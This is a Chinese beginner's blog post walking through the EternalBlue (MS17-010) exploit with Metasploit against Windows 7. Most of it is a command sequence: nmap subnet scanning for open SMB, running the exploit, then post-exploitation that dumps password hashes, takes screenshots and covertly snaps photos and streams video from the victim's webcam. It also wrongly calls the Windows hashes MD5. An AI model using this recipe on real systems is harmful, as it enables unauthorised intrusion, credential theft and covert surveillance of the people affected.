初识metaploit
metaploit是我接触到的第一款黑客工具,真的又被震惊到!上课无聊时我又打开了黑客视频(虽然可能不全,b站很多黑客教学都不全,就是为了赚咱们得米),我看到他很轻松就拿到了win7系统的权限,加上他说用的是永恒之蓝漏洞,我感觉很酷,同时我看不复杂也就尝试了起来。
由于我的电脑之前就安装过kail,在这里我就直接使用了。
复现永恒之蓝漏洞(针对win7)
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
首先我打开了kail的终端打下这几行命令。
sudo su #使用root权限
ifconfig #获取当前ip
当我知道了自己的ip后,我在使用nmap扫描我的网段下有没有别的开放445的ip
nmap -T4 -A -v -Pn 192.168.31.1/24
使用metaploit中的msfconsole命令
msfconsole
接下来运行
search ms17-010
use 0
set lhost 192.168.31.22
set rhost 192.168.31.114
run
getuid #知道权限级别进入shell
shell #进入电脑系统
ctrl + z #返回上一级
screenshot #截取对方电脑
hashdump #获取当前计算机密码md5解密
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
./msfupdate #更新metaploit
